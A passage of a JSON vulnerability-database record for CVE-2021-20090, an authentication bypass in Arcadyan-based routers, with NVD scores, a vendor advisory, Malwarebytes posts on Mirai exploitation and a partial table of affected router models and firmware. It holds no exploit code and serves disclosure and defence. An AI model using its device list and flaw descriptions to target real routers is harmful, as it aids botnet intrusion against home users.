false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2022-04-26T17:05:00", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "id": "CVE-2021-20090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:18", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:15:00", "type": "cve", "title": "CVE-2021-38703", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-38703"], "modified": "2021-09-13T14:11:00", "cpe": ["cpe:/o:kpn:experia_wifi_firmware:1.00.15"], "id": "CVE-2021-38703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:kpn:experia_wifi_firmware:1.00.15:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:17:01", "description": "The Telus Wi-Fi Hub (PRV65B444A-S-TS) with firmware version 3.00.20 is affected by an authenticated command injection vulnerability in multiple parameters passed to tr69_cmd.cgi. A remote attacker connected to the router's LAN and authenticated with a super user account, or using a bypass authentication vulnerability like CVE-2021-20090 could leverage this issue to run commands or gain a shell as root on the target device.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T17:15:00", "type": "cve", "title": "CVE-2021-20122", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20122"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:telus:prv65b444a-s-ts_firmware:3.00.20"], "id": "CVE-2021-20122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20122", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:telus:prv65b444a-s-ts_firmware:3.00.20:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:03", "description": "A directory traversal vulnerability exists in Buffalo routers. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Buffalo Routers Directory Traversal (CVE-2021-20090; CVE-2021-20091)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2021-08-23T00:00:00", "id": "CPAI-2021-0497", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-08-09T18:34:08", "description": "The early bird catches the worm. Unless the worm was early enough to hide.\n\nOn August 3, 2021 a vulnerability that was discovered by [Tenable](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) was made public. Only two days later, on August 5, [Juniper Threat Labs](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.\n\n### Router firmware\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the [description of CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>) you will find:\n\n> \u201ca path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\u201d\n\nBut during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, [Tenable lists](<https://www.tenable.com/security/research/tra-2021-13>) some 36 devices that have been confirmed to be affected. The list of affected devices include some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nThe path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the [Tenable TechBlog](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>).\n\n### Quick response\n\nOnce again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging [CVE-2021-27561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561>) and [CVE-2021-27562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27562>), just hours after vulnerability details were published.\n\n### Mirai\n\nMirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. In this way, it was able to quickly corral an army of small, Internet-connected "smart" devices, like cameras, into a botnet.\n\nYou may remember hearing about this botnet after the [massive East Coast internet outage of 2016](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/iot-antivirus-on-your-smart-device/>) when the Mirai botnet was leveraged in a [DDoS attack](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>) aimed at Dyn, an Internet infrastructure company. Traffic to Dyn's Internet directory servers throughout the US\u2014primarily on the East Coast but later on the opposite end of the country as well\u2014was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.\n\nAfter the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.\n\n### Mitigation\n\nThe vulnerability was patched in April and owners of any of the affected devices listed in the table mentioned above are advised to ask their router vendor for security patches. Tenable reported the issues to the [CERT Coordination Center](<https://kb.cert.org/vuls/>) for help with contacting and tracking all the affected vendors.\n\nWhat is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nThe post [Home routers are being hijacked using vulnerability disclosed just 2 days ago](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T17:06:56", "type": "malwarebytes", "title": "Home routers are being hijacked using vulnerability disclosed just 2 days ago", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-08-09T17:06:56", "id": "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-27T12:34:55", "description": "A few weeks ago we blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of a management interfaces that can accessed over the Internet. Both of them are vulnerable to multiple stack buffer overflows due to "unsafe" copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces are failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under CVE-2021-20090 which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealTek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. Alongside its list, Mainstream Technologies warns that: "If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch".\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819D chipset is vulnerable and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nIt is cases like these that could end up to be a deciding factor in the discussion whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T13:36:52", "type": "malwarebytes", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-24T13:36:52", "id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-08-11T13:47:42", "description": "Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.\n\nDuring the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. \n\nPlease note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.\n\nCVE-2021-20090 : Path Traversal\nCVSSv3 Base Score: 8.1\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nA path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.\nThis vulnerability has also been confirmed to affect the following devices\nnote: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.\nPlease contact the devices' respective vendors for more information.\n\n| Vendor | Device | Found on version |\n| :-----| ----: | :----: |\n| ADB | ADSL wireless IAD router | 1.26S-R-3P |\n| Arcadyan | ARV7519 | 00.96.00.96.617ES |\n| Arcadyan | VRV9517 | 6.00.17 build04 |\n| Arcadyan | VGV7519 | 3.01.116 |\n| Arcadyan | VRV9518 | 1.01.00 build44 |\n| ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |\n| ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |\n| ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |\n| ASUS | DSL-AC3100 | 1.10.05 build503 |\n| ASUS | DSL-AC68VG | 5.00.08 build272 |\n| Beeline | Smart Box Flash | 1.00.13_beta4 |\n| British Telecom | WE410443-SA | 1.02.12 build02 |\n| Buffalo | WSR-2533DHPL2 | 1.02 |\n| Buffalo | WSR-2533DHP3 | 1.24 |\n| Buffalo | BBR-4HG | |\n| Buffalo | BBR-4MG | 2.08 Release 0002 |\n| Buffalo | WSR-3200AX4S | 1.1 |\n| Buffalo | WSR-1166DHP2 | 1.15 |\n| Buffalo | WXR-5700AX7S | 1.11 |\n| Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |\n| HughesNet | HT2000W | 0.10.10 |\n| KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |\n| KPN | VGV7519 | 3.01.116 |\n| O2 | HomeBox 6441 | 1.01.36 |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |\n| SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |\n| Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |\n| TelMex | PRV33AC | 1.31.005.0012 |\n| TelMex | VRV7006 | |\n| Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |\n| Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |\n| Telus | NH20A | 1.00.10debug build06 |\n| Verizon | Fios G3100 | 2.0.0.6 |\n| Vodafone | EasyBox | 904\t4.16 |\n| 